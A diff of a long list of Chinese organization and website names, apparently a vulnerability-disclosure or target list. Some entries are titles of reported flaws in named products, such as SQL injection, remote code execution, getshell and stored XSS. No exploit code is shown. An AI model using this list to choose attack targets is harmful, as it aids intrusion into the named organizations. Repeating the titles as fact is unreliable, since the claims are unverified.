谦雅科技有限公司 谯城区纪检监察网 象州县监察委员会 @@ -22946,8 +22903,10 @@ zstu 贵阳市城市管理局 贵阳护理职业学院 贵阳朗玛信息技术 +贺尔碧格东方齿轮 资中县人民检察院 资阳市环境保护局 +赛业健康研究中心 赛尔网络有限公司 赛诺医疗科学技术 赣州市电化教育馆 @@ -22957,6 +22916,7 @@ zstu 起步股份有限公司 跨境通宝电子商务 软控股份有限公司 +软通动力信息技术 辅仁药业集团制药 辽宁对外经贸学院 辽宁工程技术大学 @@ -23003,6 +22963,7 @@ zstu 邢台市城乡规划局 邢台广播电视大学 邢台职业技术学院 +邦储国际货运代理 邦德国际教育机构 邮政编码查询系统 邵阳职业技术学院 @@ -23026,6 +22987,7 @@ zstu 鄂尔多斯市公安局 鄂州市公众服务网 酒泉职业技术学院 +重庆三峡水利电力 重庆农村商业银行 重庆博腾制药科技 重庆城市管理学院 @@ -23052,6 +23014,7 @@ zstu 金利达药品交易网 金华春光橡塑科技 金华职业技术学院 +金地股份有限公司 金堂县公众信息网 金寨县政府采购网 金山区人民政协网 @@ -23061,6 +23024,7 @@ zstu 钟山职业技术学院 钢研纳克检测技术 钦州市行政审批局 +铁岭新城投资控股 铁路集团青藏公司 铁锋区教育局网站 铜仁市环境保护局 @@ -23087,6 +23051,7 @@ zstu 长安医院有限公司 长春奥普光电技术 长春市社会保险网 +长春高新技术产业 长武县人民检察院 长江润发健康产业 长沙养老服务系统 @@ -23118,7 +23083,9 @@ zstu 陕西学前师范学院 陕西宝光真空电器 陕西广播电视集团 +陕西广电网络传媒 陕西延长石油化建 +陕西煤业化工建设 陕西煤业化工集团 陕西盘龙药业集团 陕西省交通运输厅 @@ -23141,12 +23108,14 @@ zstu 雄安科融环境科技 雅安职业技术学院 雅礼洋湖实验中学 +集慧知识产权代理 霍山县纪检监察网 青岛东软载波科技 青岛中资中程集团 青岛农村商业银行 青岛商务管理学院 青岛国林环保科技 +青岛城市建设投资 青岛市农业委员会 青岛市实验幼儿园 青岛市政府采购网 @@ -23169,10 +23138,12 @@ zstu 青海省水利信息网 青海省知识产权局 青海金瑞矿业发展 +青牛技术有限公司 靖西市纪检监察网 鞍山市社会保险局 鞍山重型矿山机器 鞍钢股份有限公司 +韧启企业管理咨询 顺丰速运有限公司 顺义区党建工作组 顺义区教育委员会 @@ -23191,6 +23162,7 @@ zstu 香溢融通控股集团 马尔康市人民法院 马来西亚教育联盟 +马钢控股有限公司 马鞍山党风廉政网 马鞍山市人民政府 驼人集团官方网站 @@ -23200,6 +23172,7 @@ zstu 高校教学研究中心 高邮市政府采购网 高邮市教育局机关 +鬼工科技有限公司 鲁信创业投资集团 鲁商健康产业发展 鸡西市人大常委会 @@ -23237,73 +23210,16 @@ zstu 龙发装饰集团官网 龙虎山电子商务网 龙马潭区人民法院 -山东大学口腔医院 -山东大学护理学院 -山东大学研究生处 -智明文档管理系统 - SQL注入漏洞 (demo演示) +智明文档管理系统 - SQL注入漏洞 美络综合办公系统 - 三处SQL注入 美络综合办公系统 - 远程代码执行 美络综合办公系统 - 远程代码执行#2 北京青年政治学院 北京市团校网站 -上海大众公用事业(集团) -上海延华智能科技(集团) -上海豫园旅游商城(集团) -中炬高新技术实业(集团) -亚翔系统集成科技(苏州) -北方联合出版传媒(集团) -南京音飞储存设备(集团) -天津市房地产发展(集团) -安徽安科生物工程(集团) -宣亚国际营销科技(北京) -山东省烟草专卖局(公司) -怡球金属资源再生(中国) -新疆青松建材化工(集团) -深圳市新南山控股(集团) -濮阳濮耐高温材料(集团) -重庆三峡水利电力(集团) -铁岭新城投资控股(集团) -长春高新技术产业(集团) -陕西广电网络传媒(集团) -中兴天恒能源科技(北京)股份公司 -北京首都开发控股(集团)有限公司 -快快金融信息服务(上海)有限公司 -昊翔电能运动科技(昆山)有限公司 -明治制果食品工业(上海)有限公司 -海克斯康测量技术(青岛)有限公司 -苏州创元投资发展(集团)有限公司 -重庆交通运输控股(集团)有限公司 -阿里斯顿热能产品(中国)有限公司 -上海华培动力科技(集团)股份有限公司 -上海大众公用事业(集团)股份有限公司 -上海延华智能科技(集团)股份有限公司 -上海豫园旅游商城(集团)股份有限公司 -中炬高新技术实业(集团)股份有限公司 -亚翔系统集成科技(苏州)股份有限公司 -北方联合出版传媒(集团)股份有限公司 -南京音飞储存设备(集团)股份有限公司 -天津市房地产发展(集团)股份有限公司 -安徽安科生物工程(集团)股份有限公司 -宣亚国际品牌管理(北京)股份有限公司 -宣亚国际营销科技(北京)股份有限公司 -思瑞浦微电子科技(苏州)股份有限公司 -怡球金属资源再生(中国)股份有限公司 -恒宇信通航空装备(北京)股份有限公司 -新疆青松建材化工(集团)股份有限公司 -深圳市新南山控股(集团)股份有限公司 -濮阳濮耐高温材料(集团)股份有限公司 -重庆三峡水利电力(集团)股份有限公司 -铁岭新城投资控股(集团)股份有限公司 -长春高新技术产业(集团)股份有限公司 -陕西广电网络传媒(集团)股份有限公司 -珠海企业服务平台(政企云) -江西财经职业学院(南昌校区) 杭州海创科技中心--神箭手云 重庆市农业科学院--茶树病虫害绿色防控管理系统 焦作市运政信息网-官网 鄂州市公众服务网-网上警局 麦塔在线考试系统-通用存在型xss和越权登录任意用户 -明纬(广州)电子-明纬开关电源 -豪爵控股有限公司/豪爵官方商城 柳州市政府热线“12345” 黑龙江省委组织部12380网上举报平台 禅知企业门户系统6.6储存XSS打后台 @@ -23315,7 +23231,7 @@ zstu 丽晶软件提供服装ERP 媒体内容管理平台GETSHELL 花牧兰全农产业链O2O大数据云平台 -通用学习管理系统POST型SQL注入漏洞(五处打包) +通用学习管理系统POST型SQL注入漏洞 北京拓敏信息技术QuarkCall呼叫中心平台存在通用型SQL注入漏洞 通用学习管理系统SQL注入漏洞 通用采购系统存在SQL注入漏洞 @@ -23411,6 +23327,7 @@ zstu 东南大学教育培训网 东南大学苏州研究院 东安县政务服务中心 +东海堂食品有限公司 东莞市宇瞳光学科技 东莞市经济贸易学校 东阳市教育局电教馆 @@ -23478,11 +23395,14 @@ zstu 中国信息通信研究院 中国农村远程教育网 中国包装联合会网站 +中国北方稀土高科技 中国医药集团总公司 中国国家数字图书馆 中国国际劳务信息网 中国国际合成皮革网 中国国际旅行社总社 +中国国际汽车博览会 +中国国际海运集装箱 中国国际电视总公司 中国国际航空公司网 中国太平洋保险公司 @@ -23611,6 +23531,7 @@ zstu 云港经济技术开发区 五大连池市人民政府 五莲县群众服务中心 +亚速旺商贸有限公司 亳州市委政策研究室 亳州市网上办事大厅 亳州市谯城区教育局 @@ -23623,8 +23544,8 @@ zstu 伊春带岭政府门户网 伊朗国航中国分公司 休宁县政府门户网站 -优利德科技(中国) 优就业任意账号注册 +优慕课在线教育科技 佛山市三水区图书馆 佛山市政府采购中心 佛山市海天调味食品 @@ -23664,6 +23585,7 @@ zstu 内蒙古自治区民政厅 内蒙古自治区财政厅 内蒙古蒙电华能热电 +内蒙古蒙草生态环境 内蒙古鄂尔多斯资源 农业农村部信息中心 农信银在线学习系统 @@ -23676,6 +23598,7 @@ zstu 北京万邦达环保技术 北京三聚环保新材料 北京东审会计事务所 +北京中关村科技发展 北京中关村第四小学 北京中山公园音乐堂 北京中科三环高技术 @@ -23684,6 +23607,7 @@ zstu 北京四方继保自动化 北京大北农科技集团 北京大学国际法学院 +北京大学教育基金会 北京大学新材料学院 北京大学汇丰商学院 北京大学生命科学院 @@ -23720,6 +23644,7 @@ zstu 千喜鹤股份有限公司 华东师范大学图书馆 华中科技大学出版社 +华尔街英语培训中心 华昌达智能装备集团 华润微电子有限公司 华润集团太平洋咖啡 @@ -23760,12 +23685,14 @@ zstu 厦门市保安有限公司 厦门市美亚柏科信息 厦门瑞尔特卫浴科技 +发现时空国际旅行社 句容市婚姻登记管理 台州人才网有限公司 台州市第一人民医院 台海玛努尔核电设备 台湾省财政厅省库署 史丹利化肥有限公司 +合肥市人才服务中心 合肥市第六人民医院 吉林农产品交易中心 吉林吉大通信设计院 @@ -23781,11 +23708,13 @@ zstu 吉林省集安益盛药业 吉林省食品稽查总队 吉林省高级人民法院 +同方知好乐教育科技 同江市人民政府网站 启明星辰福建分公司 吴江区青云实验中学 周兴和实业有限公司 周口市人事培训中心 +周口市行政服务中心 呼和浩特档市档案局 和县人民政府办公室 和龙市人民政府网站 @@ -23840,6 +23769,7 @@ zstu 四川联合环境交易所 四川青年志愿者协会 回天新材料有限公司 +团车互联网信息服务 固始县人民政府网站 国安达股份有限公司 国家互联网应急中心 @@ -23913,6 +23843,7 @@ zstu 宁波继峰汽车零部件 宁波网传媒有限公司 宁波锦浪新能源科技 +宇龙计算机通信科技 安庆市宜秀区人大网 安庆市宿松县司法局 安庆经济技术开发区 @@ -23956,6 +23887,7 @@ zstu 富锦市扶贫开发中心 射阳县委组织部网站 小汤山蔬菜网上商城 +小狗电器互联网科技 尤洛卡精准信息工程 尤特尔生化有限公司 山东临沂财会信息网 @@ -24105,6 +24037,7 @@ zstu 廊坊企业云服务平台 廊坊司法局某处漏洞 廊坊市人民检察院党 +延安市网上群众工作 建湖县委组织部分站 开福区政府门户网站 弈网电脑科技工作室 @@ -24130,6 +24063,7 @@ zstu 惠州市惠城区财政局 惠州市第一人民医院 惠州硕贝德无线科技 +惠而浦股份有限公司 成都卫士通信息产业 成都嘉祥外国语学校 成都工商行政管理局 @@ -24216,7 +24150,9 @@ zstu 杭州福斯特应用材料 杭州致梦科技有限伺 杭州雷迪克节能科技 +杭州高新区门户网站 杭州鸿泉物联网技术 +林同棪国际工程咨询 林芝工业和信息化局 林西县政府采购中心 枝江市官方门户网站 @@ -24468,6 +24404,7 @@ zstu 深圳知识产权服务网 深圳科创新源新材料 深圳科安达电子科技 +深圳经济特区房地产 深圳金信诺高新技术 温州市文成县安监局 温州市海洋与渔业局 @@ -24573,6 +24510,7 @@ zstu 磁县人民政府办公室 磐石市房地产信息网 社会科学文献出版社 +神州顺利办企业发展 福州外语外贸学学院 福建永安农业信息网 福建省台湾文献中心 @@ -24583,6 +24521,7 @@ zstu 福然德股份有限公司 禹州市政务服务中心 秦皇岛市城乡规划局 +秦皇岛市政服务中心 秦皇岛市科学技术局 秦皇岛职业技术学院 稻花香集团官方网站 @@ -24615,11 +24554,11 @@ zstu 肇庆高要区人民法院 自媒体学习交流平台 自流井区人民检察院 -自然堂(伽蓝集团) 舒兰市房地产信息网 舟山市工商业联合会 舟山市消费者维权网 舟山市行政服务中心 +艾百思科技有限公司 芜湖市电梯管理系统 芜湖市直机关党建网 芜湖市第四人民医院 @@ -24646,6 +24585,7 @@ zstu 蒙城县第二人民医院 蓝港互动—蓝港游戏 蘇民峰命理風水網站 +衡阳广播电影电视局 衡阳房产交易服务网 衢州市柯城区监察委 襄城县第三高级中学 @@ -24662,6 +24602,7 @@ zstu 西安蓝晓科技新材料 西安铂力特增材技术 西柏坡智慧景区网站 +西铁城钟表有限公司 许昌市行政服务中心 许昌开普电气研究院 诺达名师企业培训网 @@ -24693,6 +24634,7 @@ zstu 走四方走四方旅游网 超星公司某软件产品 跨境全日通有限公司 +车好多旧机动车经纪 软吧下载吧官方网站 辛集市行政服务中心 辽宁共青团官方网站 @@ -24706,6 +24648,7 @@ zstu 辽宁省营口市组织部 辽宁省高级人民法院 辽阳市白塔公安分局 +达芙妮投资有限公司 运城市纪委监委网站 连云港市城乡建设局 连云港市政府采购网 @@ -24774,6 +24717,7 @@ zstu 长沙市芙蓉区教育局 长沙经济技术开发区 长治市保险行业协会 +阜阳市房地产管理局 阜阳市界首市公安局 阜阳市颍东区财政局 阜阳市颍州区财政局 @@ -24810,6 +24754,7 @@ zstu 韶山中国国际旅行社 顺德区教育信息中心 风信子跨境直购商城 +飞亚达股份有限公司 马鞍山中加双语学校 高平市行政审批中心 高等教育数字图书馆 @@ -24818,6 +24763,7 @@ zstu 黄冈市房地产管理局 黄江二手车易隆官网 黑河边境经济合作区 +黑牡丹股份有限公司 黑龙江伊春友好政府 黑龙江公共服务平台 黑龙江残疾人联合会 @@ -24840,20 +24786,6 @@ zstu 广东省网上办事大厅 - 珠海分厅 心理学第一门户网站 中国NLP学院 成都名品叁陆伍电子 科技有限公司 -秦皇岛市政服务中心(12345市长热线) -中国国际海运集装箱(集团) -内蒙古蒙草生态环境(集团) -北京中关村科技发展(控股) -深圳经济特区房地产(集团) -发现时空国际旅行社(北京)有限公司 -重庆市公共交通控股(集团)有限公司 -中国国际海运集装箱(集团)股份有限公司 -云南鸿翔一心堂药业(集团)股份有限公司 -内蒙古蒙草生态环境(集团)股份有限公司 -北京中关村科技发展(控股)股份有限公司 -深圳经济特区房地产(集团)股份有限公司 -合肥市人才服务中心(合肥市人才市场) -四川久大盐业(集团)公司 中国信息通信研究院-技术与标准研究所 中共宝鸡市委组织部12380举报网站 聊城临清市委组织部12380举报网站 @@ -24865,10 +24797,10 @@ zstu 一采通采购系统存在SQL注入漏 一采通采购系统存在SQL注入漏洞 华夏化工网某处存在SQL注入漏洞 +某智能网关系统任意SQL执行漏洞 某通用系统管理系统SQL注入漏洞 通用办公云系统存在SQL注入漏洞 某通用系统管理系统SQL注入漏洞2 -某智能网关系统任意SQL执行漏洞(无需登录) 南京云化通网络科技Web960企业建站系统存在通用型SQL注入 框分类信息系统一处XXE 润乾报表系统又一处getshell @@ -24907,6 +24839,7 @@ zstu 三角轮胎股份有限公司 三门峡市保险行业协会 三顺物流股份有限公司 +上工申贝股份有限公司 上汽大众汽车有限公司 上汽通用汽车有限公司 上汽集团股份有限公司 @@ -24915,6 +24848,7 @@ zstu 上海东证期货有限公司 上海中侨职业技术学院 上海中晶科技有限公司 +上海丰华股份有限公司 上海九百股份有限公司 上海亚通股份有限公司 上海人才发展服务中心 @@ -24949,6 +24883,7 @@ zstu 上海宗胤商贸有限公司 上海岱牧网络有限公司 上海工商职业技术学院 +上海巴士公交有限公司 上海市中西医结合医院 上海市人社局信息中心 上海市公积金管理中心 @@ -24987,6 +24922,7 @@ zstu 上海永达电商管理平台 上海汇金百货有限公司 上海泊冉软件有限公司 +上海海立股份有限公司 上海游奇网络有限公司 上海灵当科技有限公司 上海璞泰来新能源科技 @@ -25022,13 +24958,16 @@ zstu 上海踏歌物流有限公司 上海远洋运输有限公司 上海通用汽车有限公司 +上海邮通科技有限公司 上海银行股份有限公司 上海锐普广告有限公司 上海锦江国际实业投资 +上海锦江航运有限公司 上海隧道工程有限公司 上海飞机制造有限公司 上海鲁班软件有限公司 上海齐表科技有限公司 +上海龙头股份有限公司 上能电气股份有限公司 世界中医药学会联合会 东兴证券股份有限公司 @@ -25038,6 +24977,7 @@ zstu 东华理工大学长江学院 东华能源股份有限公司 东南大学附属中大医院 +东南汽车工业有限公司 东南航空技术有限公司 东吴证券股份有限公司 东方出版中心有限公司 @@ -25046,8 +24986,10 @@ zstu 东方电气股份有限公司 东方证券股份有限公司 东方通信股份有限公司 +东方金融控股有限公司 东方金钰股份有限公司 东方鑫源控股有限公司 +东方锅炉股份有限公司 东方集团股份有限公司 东明县组织部举报平台 东易日盛家居装饰集团 @@ -25058,11 +25000,9 @@ zstu 东营市人民政府办公室 东营市工商行政管理局 东软集团股份有限公司 -东软(集团)有限公司 东部战区总医院图书馆 东阳市教育网旗下云校 东阿阿胶股份有限公司 -东陶(中国)有限公司 东风柳州汽车有限公司 东风汽车股份有限公司 东风汽车集团有限公司 @@ -25091,6 +25031,7 @@ zstu 中兴通讯股份有限公司 中兵红箭股份有限公司 中创物流股份有限公司 +中化国际股份有限公司 中北大学信息商务学院 中华人民共和国教育部 中华人民共和国水利部 @@ -25139,6 +25080,7 @@ zstu 中国国学文化艺术中心 中国国旅股份有限公司 中国国旅集团有限公司 +中国国际贸易单一窗口 中国国际金融有限公司 中国土地流转信息中心 中国城市轨道交通协会 @@ -25184,12 +25126,12 @@ zstu 中国石化山东泰山石油 中国石化销售有限公司 中国石油和化工网公司 -中国石油大学(华东) 中国石油辽河油田公司 中国科学院心理研究所 中国科学院软件研究所 中国移动通信集团公司 中国移动集团浙江公司 +中国聋儿康复研究中心 中国职业技术教育学会 中国联通北京市分公司 中国联通哈尔滨分公司 @@ -25229,6 +25171,7 @@ zstu 中山市黄圃镇人民政府 中山火炬职业技术学院 中山证券有限责任公司 +中建国际投资有限公司 中弘控股股份有限公司 中惠保险经纪有限公司 中意人寿保险有限公司 @@ -25249,13 +25192,13 @@ zstu 中海地产集团有限公司 中海基金管理有限公司 中海物业管理有限公司 -中港通集团(香港站) 中源协和细胞基因工程 中源家居股份有限公司 中煤招标有限责任公司 中牧实业股份有限公司 中电环保股份有限公司 中电电机股份有限公司 +中票在线票务有限公司 中科星图股份有限公司 中移电子商务有限公司 中简科技股份有限公司 @@ -25362,10 +25305,12 @@ zstu 亚太财产保险有限公司 亚振家具股份有限公司 亚振家居股份有限公司 +亚朵酒店管理有限公司 亚龙湾国家旅游度假区 交控科技股份有限公司 交通运输部烟台打捞局 交通银行股份有限公司 +亨特道格拉斯建筑产品 京投发展股份有限公司 京能置业股份有限公司 京蓝科技股份有限公司 @@ -25391,6 +25336,7 @@ zstu 优优祝福科技有限公司 会唐世纪科技有限公司 伟时电子股份有限公司 +伟肯电气传动有限公司 传化智联股份有限公司 佛山市三水区人民法院 佛山市公共资源交易网 @@ -25407,16 +25353,6 @@ zstu 保定市满城区人民政府 保定市竞秀区人民政府 信用中国河北涞源县网 -信用中国(宁夏银川) -信用中国(山东济南) -信用中国(广东汕头) -信用中国(广东湛江) -信用中国(河南周口) -信用中国(河南新蔡) -信用中国(河南永城) -信用中国(河南鹤壁) -信用中国(河南鹿邑) -信用中国(辽宁朝阳) 信诚人寿保险有限公司 信达地产股份有限公司 信达证券股份有限公司 @@ -25440,6 +25376,7 @@ zstu 全国音乐等级考试官网 全柴动力股份有限公司 全球贸易收单卖单平台 +八方电气股份有限公司 公安部上海消防研究所 公安部四川消防研究所 公安部天津消防研究所 @@ -25450,12 +25387,14 @@ zstu 六安市电子政务政务云 兰州交通大学教务系统 兰州市工商行政管理局 +兰州民百股份有限公司 兰州石化职业技术学院 兰州航空工业职工大学 共达电声股份有限公司 兴业证券股份有限公司 兴业银行股份有限公司 兴全基金管理有限公司 +兴民智通股份有限公司 冀中公安网燕赵警民通 冀中能源股份有限公司 内蒙古人事考试资讯网 @@ -25473,6 +25412,7 @@ zstu 凤凰光学股份有限公司 凤城市经济和信息化局 凭祥市人民政府信访局 +凯撒文化股份有限公司 凯盛科技股份有限公司 凯里互联网众创产业园 凯里第一中学官方网站 @@ -25487,6 +25427,9 @@ zstu 利达光电股份有限公司 前后科技股份有限公司 剑圣网络科技有限公司 +力合科技股份有限公司 +力帆实业股份有限公司 +力帆科技股份有限公司 助梦网络科技有限公司 包头市卫生健康委员会 包头轻工职业技术学院 @@ -25563,6 +25506,7 @@ zstu 北京市顺义区人民政府 北京师范大学珠海分校 北京师范大学附属中学 +北京康加科技有限公司 北京弘高创意建筑设计 北京当代艺术研修学院 北京得间科技有限公司 @@ -25671,6 +25615,7 @@ zstu 华夏航空股份有限公司 华夏认证中心有限公司 华夏银行股份有限公司 +华奥星空信息技术公司 华孚时尚股份有限公司 华安期货有限责任公司 华安证券股份有限公司 @@ -25681,13 +25626,13 @@ zstu 华文食品股份有限公司 华斯控股股份有限公司 华新水泥股份有限公司 +华映科技股份有限公司 华晋焦煤有限责任公司 华晨宝马汽车有限公司 华林证券股份有限公司 华泰保险经纪有限公司 华泰证券股份有限公司 华泰财产保险有限公司 -华润(集团)有限公司 华灿光电股份有限公司 华瑞电器股份有限公司 华电能源股份有限公司 @@ -25705,9 +25650,11 @@ zstu 华鑫证券有限责任公司 华飞餐饮培训加盟总部 协和精细化学制品公司 +卓望信息技术有限公司 南京东沛国际贸易集团 南京信息职业技术学院 南京先极科技有限公司 +南京公共交通有限公司 南京公用事业技工学校 南京化纤股份有限公司 南京医药股份有限公司 @@ -25828,6 +25775,7 @@ zstu 合肥社会保险征缴中心 合肥美菱股份有限公司 吉安市旅游发展委员会 +吉林亚泰股份有限公司 吉林交通职业技术学院 吉林化纤股份有限公司 吉林大学继续教育学院 @@ -25866,6 +25814,7 @@ zstu 品渥食品股份有限公司 哈尔滨市香坊区城管局 哈尔滨统计大数据平台 +哈森商贸股份有限公司 哈药集团三精营销中心 哈药集团人民同泰医药 哈药集团股份有限公司 @@ -25941,6 +25890,7 @@ zstu 四川西南航空职业学院 四川跃上科技有限公司 四川邮电职业技术学院 +四川金顶股份有限公司 四方光电股份有限公司 国信优易数据有限公司 国信证券股份有限公司 @@ -25965,6 +25915,7 @@ zstu 国家能源局山东监管办 国家能源局甘肃监管办 国家超级计算无锡中心 +国家食品安全追溯平台 国投盘江发电有限公司 国投资本股份有限公司 国新健康保障服务集团 @@ -25984,12 +25935,14 @@ zstu 国药控股股份有限公司 国轩高科股份有限公司 国通电子股份有限公司 +国都证券股份有限公司 国金基金管理有限公司 国金期货有限责任公司 国金证券股份有限公司 国际天食集团有限公司 圆通速递股份有限公司 圣元环保股份有限公司 +在线途游科技有限公司 地理信息公共服务平台 地素时尚股份有限公司 城发环境股份有限公司 @@ -25999,11 +25952,13 @@ zstu 多伦科技股份有限公司 大业信托有限责任公司 大丰市市场监督管理局 +大众交通股份有限公司 大冶市财政局内部门户 大同市人民政府办公厅 大同煤业股份有限公司 大同证券有限责任公司 大唐高鸿数据网络技术 +大富科技股份有限公司 大庆华科股份有限公司 大族激光科技产业集团 大江东市场监督管理局 @@ -26014,6 +25969,7 @@ zstu 大连保税区管理委员会 大连医科大学中山学院 大连华天软件有限公司 +大连友谊股份有限公司 大连女子职业中专学校 大连市不动产登记中心 大连市营商环境建设局 @@ -26075,6 +26031,7 @@ zstu 天通控股股份有限公司 天邦食品股份有限公司 天门市劳动就业管理局 +天顺风能股份有限公司 天风证券股份有限公司 天齐锂业股份有限公司 太仆寺旗委员会组织部 @@ -26088,9 +26045,11 @@ zstu 太原重工股份有限公司 太平人寿保险有限公司 太空智造股份有限公司 +央广小品科技有限公司 奇瑞汽车股份有限公司 奇精机械股份有限公司 奥普家居股份有限公司 +奥普电器股份有限公司 奥维通信股份有限公司 奥飞娱乐股份有限公司 好享购物股份有限公司 @@ -26101,6 +26060,7 @@ zstu 威海市文登区人民政府 威海市文登区网上党校 孚日集团股份有限公司 +孚能科技股份有限公司 孝感市孝南区委组织部 孝感齐天网络有限公司 宁乡县经济和信息化局 @@ -26235,6 +26195,7 @@ zstu 宣城市城市管理执法局 家家购物股份有限公司 家有购物集团有限公司 +宸展光电股份有限公司 容商天下网络有限公司 宿迁市人民政府办公室 宿迁市公安局宿豫分局 @@ -26266,6 +26227,7 @@ zstu 山东大学工程训练中心 山东大学生物统计学系 山东大学继续教育学院 +山东大学附属生殖医院 山东奥太电气有限公司 山东如意毛纺服装集团 山东枣庄市市中区政府 @@ -26426,6 +26388,7 @@ zstu 广东美特机械有限公司 广东肇庆星湖生物科技 广东腾骏药业有限公司 +广东舜喆股份有限公司 广东认真企业有限公司 广东谷通科技有限公司 广东财经大学华商学院 @@ -26434,6 +26397,7 @@ zstu 广东锐进广告有限公司 广东长荣科技有限公司 广东长隆集团有限公司 +广东长青股份有限公司 广东顺心快运有限公司 广东飘影实业有限公司 广东食品药品职业学院 @@ -26515,10 +26479,12 @@ zstu 广西科文招标有限公司 广西经贸职业技术学院 广西英华国际职业学院 +广西贵糖股份有限公司 广西那坡县人民政府网 康佳售后服务支持平台 康佳集团股份有限公司 康力电梯股份有限公司 +康平科技股份有限公司 康美药业股份有限公司 康芝药业股份有限公司 康跃科技股份有限公司 @@ -26532,9 +26498,11 @@ zstu 延边朝鲜族自治州政府 建信财产保险有限公司 建新赵氏集团有限公司 +建科机械股份有限公司 开封文化艺术职业学院 开源证券股份有限公司 引力传媒股份有限公司 +弘付数据科技有限公司 张家港市第一人民医院 弥渡县人民政府办公室 彩讯科技股份有限公司 @@ -26559,6 +26527,7 @@ zstu 怀远县市场监督管理局 思源电气股份有限公司 思美传媒股份有限公司 +恒为科技股份有限公司 恒力石化股份有限公司 恒大人寿保险有限公司 恒大地产集团有限公司 @@ -26566,6 +26535,7 @@ zstu 恒天海龙股份有限公司 恒林家居股份有限公司 恒泰证券股份有限公司 +恒玄科技股份有限公司 恒生电子股份有限公司 恒通物流股份有限公司 恒逸石化股份有限公司 @@ -26633,6 +26603,7 @@ zstu 成都芯澄科技有限公司 成都芸朵科技有限公司 成都莱想科技有限公司 +成都蚂蚁物流有限公司 成都透客科技有限公司 成都金控征信有限公司 成都银行股份有限公司 @@ -26654,7 +26625,6 @@ zstu 招商局蛇口工业区控股 招商证券股份有限公司 招商银行股份有限公司 -拜耳(中国)有限公司 振兴生化股份有限公司 捷安特自行车中国官网 掌阅科技股份有限公司 @@ -26692,14 +26662,17 @@ zstu 新湖中宝股份有限公司 新疆众和股份有限公司 新疆农业职业技术学院 +新疆友好股份有限公司 新疆天业股份有限公司 新疆天业集团有限公司 新疆天山畜牧生物工程 新疆建设职业技术学院 新疆驾驶培训监管平台 新知堂剑桥少儿英语网 +新闻媒体系统文件读取 方大集团股份有限公司 方正证券股份有限公司 +施耐德某产品漏洞打包 无锡一米网络有限公司 无锡商业职业技术学院 无锡城市职业技术学院 @@ -26710,6 +26683,7 @@ zstu 无锡深南电路有限公司 无锡药明康德新药开发 日月重工股份有限公司 +日本财产保险有限公司 日照市人民政府信访局 日照市委市政府信访局 日照市岚山区人民政府 @@ -26865,6 +26839,8 @@ zstu 楚天科技股份有限公司 模拟飞行运行控制中心 横店影视股份有限公司 +樱花卫厨股份有限公司 +欣龙控股股份有限公司 欧普照明股份有限公司 欧浦智网股份有限公司 欧菲科技股份有限公司 @@ -26890,7 +26866,6 @@ zstu 武汉窗友科技有限公司 武汉网睿科技有限公司 武汉船舶职业技术学院 -武汉英中(培训)学校 武汉英福软件有限公司 武汉软件工程职业学院 武汉钢铁股份有限公司 @@ -26915,6 +26890,7 @@ zstu 永辉超市股份有限公司 永达安全服务运营系统 汇中仪表股份有限公司 +汇中普惠财富投资管理 汇付数据服务有限公司 汇纳科技股份有限公司 汉中市南郑县人民政府 @@ -26985,6 +26961,7 @@ zstu 江苏航天信息有限公司 江苏苏州农村商业银行 江苏财经职业技术学院 +江苏银茂控股有限公司 江苏银行股份有限公司 江苏阳光股份有限公司 江西交通职业技术学院 @@ -27100,6 +27077,7 @@ zstu 河南机电高等专科学校 河南港中国际旅游集团 河南理工大学财经学院 +河南省周口市行政服务 河南省国土资源监察局 河南省安阳市委组织部 河南省工商行政管理局 @@ -27258,6 +27236,7 @@ zstu 海南企业联合会微官网 海南天然橡胶产业集团 海南怡嘉工程有限公司 +海南椰岛股份有限公司 海南海药股份有限公司 海南省人民防空办公室 海南省国土环境资源厅 @@ -27282,12 +27261,14 @@ zstu 海航创新股份有限公司 海航基础设施投资集团 海航科技股份有限公司 +海虹企业股份有限公司 海豚村海外直邮购物网 海迈科技股份有限公司 海通网络科技有限公司 海通证券股份有限公司 海银财富管理有限公司 海马汽车股份有限公司 +海默科技股份有限公司 消防办事大厅后台管理 润建通信股份有限公司 淄博发展和改革委员会 @@ -27299,9 +27280,11 @@ zstu 淮安市机关事务管理局 淮安市洪泽区人民法院 淮安市清浦区人民政府 +淮河能源股份有限公司 淮阴区纪律检查委员会 深南电路股份有限公司 深南金科股份有限公司 +深圳一电科技有限公司 深圳万狼科技有限公司 深圳乐播科技有限公司 深圳九有股份有限公司 @@ -27357,6 +27340,7 @@ zstu 清丰县文化广电旅游局 清华大学教参服务平台 清华大学经济管理学院 +清源科技股份有限公司 清远市人民政府办公室 清远市清新区人民政府 清镇市干部在线学习网 @@ -27463,6 +27447,7 @@ zstu 潍柴控股集团有限公司 潍柴重机股份有限公司 潜山县宏顺房产经纪行 +潮州三环股份有限公司 澜起科技股份有限公司 澳門特別行政區民航局 瀚蓝环境股份有限公司 @@ -27524,6 +27509,7 @@ zstu 白城市洮北区人民政府 白水县人民检察院官网 白鸽集团股份有限公司 +百世物流科技有限公司 百大集团股份有限公司 百川能源股份有限公司 百帆网络科技有限公司 @@ -27560,6 +27546,7 @@ zstu 神驰机电股份有限公司 祥鑫科技股份有限公司 福人集团有限责任公司 +福安药业股份有限公司 福州天盟数码有限公司 福州天福集团有限公司 福州市城乡建设委员会 @@ -27608,6 +27595,7 @@ zstu 章丘区纪委监察局网站 章丘相公庄街道办事处 筑博设计股份有限公司 +筑客网络技术有限公司 精伦电子股份有限公司 索通发展股份有限公司 紫光国芯股份有限公司 @@ -27618,6 +27606,7 @@ zstu 绍兴港航水文信息系统 绍兴灵瑞广告有限公司 绝味食品股份有限公司 +统一企业投资有限公司 绥芬河边境经济合作区 维普时代科技有限公司 维科技术股份有限公司 @@ -27643,11 +27632,13 @@ zstu 联奕科技股份有限公司 联美量子股份有限公司 联讯证券股份有限公司 +聚众网通科技有限公司 +聚光科技股份有限公司 聚数科技成都有限公司 聚美优品科技有限公司 -聚诚(深圳)网络科技 肇庆医学高等专科学校 肇庆市鼎湖区人民政府 +胜宏科技股份有限公司 胜蓝科技股份有限公司 能科科技股份有限公司 腾邦国际商业服务集团 @@ -27666,10 +27657,13 @@ zstu 良品铺子股份有限公司 良精软件科技建站系统 艺品万家艺术服务平台 +艾康生物技术有限公司 艾格拉斯股份有限公司 +艾艾精密工业输送系统 芒果超媒股份有限公司 芜湖华衍水务有限公司 芜湖市镜湖区人民法院 +芯海科技股份有限公司 花垣县人民政府办公室 苏宁环球股份有限公司 苏州大学应用技术学院 @@ -27690,6 +27684,7 @@ zstu 苏州银行股份有限公司 苏州韬奋商贸有限公司 苏州麦迪斯顿医疗科技 +英才网联咨询有限公司 茂业商业股份有限公司 茂名水文站网管理系统 荣安地产股份有限公司 @@ -27744,6 +27739,7 @@ zstu 西安市新城区人民政府 